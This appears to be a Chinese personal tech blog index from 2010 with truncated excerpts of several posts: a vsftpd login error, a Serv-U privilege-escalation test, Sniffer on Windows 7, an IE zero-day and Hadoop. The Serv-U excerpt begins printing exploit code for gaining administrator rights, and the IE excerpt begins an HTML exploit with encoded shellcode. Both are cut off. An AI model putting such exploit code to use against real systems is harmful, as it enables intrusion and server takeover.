天行健,君子以自强不息;
地势坤,君子以厚德载物;
vsftpd 421 Service not available, remote server has closed connection
作者:曲文庆 日期:2010-05-20 14:05
操作系统CentOS从5.3升级到5.4后,vsftpd也从vsftpd-2.0.5-12.el5_3.1.x86_64升级到vsftpd-2.0.5-16.el5.x86_64,配置文件未变化,但是正常用户登录后提示:
$ ftp quwenqing.com
Connected to quwenqing.com (x.x.x.x).
220 (vsFTPd 2.0.5)
Name (quwenqing.com:test):
530 Please login with USER and PASS.
SSL not available
331 Please specify the p
SERV_u6.4安全漏洞测试
作者:曲文庆 日期:2010-05-18 10:36
在某安全论坛看到SERV-U又暴新漏洞,该漏洞通杀包括SERV-U 6.4及其以前的所有版本。如果服务器安装了SERV-U,攻击者在获得了网站的Webshell后利用该漏洞就可以进行提权,建立拥有管理员权限的帐户,进而完全控制服务器。
下面笔者搭建测试环境,利用该论坛提供的提权代码见图1进行漏洞测试。
提权的代码如下:
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass "
Windows 7 安装、运行 Sniffer 4.7.5 sp5
作者:曲文庆 日期:2010-04-30 08:55
Sniffer被 Network General公司注册为商标,这家公司以出品Sniffer Pro系列产品而知名。目前最新版本为Sniffer
传说中的IE 0day
作者:曲文庆 日期:2010-01-19 08:55
影响IE6-IE8全系列,传说中Google“被入侵”所用到的那份。
<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3
Hadoop
作者:曲文庆 日期:2010-01-11 10:34
Hadoop 
一个分布式系统基础架构,由Apache基金会开发。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力高速运算和存储。
起源:Google的集群系统
Google的数据中心使用廉价的Linux PC机组成集群,在上面运行各种应用。即使是分布式开发的新手也可以迅速使用Google的基础设施。核心组件是3个:
1、GFS(Google File System)。一个分布式文件系统,隐藏下层负载均衡,冗余复制等细节,对上层程序提供一个统一的文件系统API接口。Googl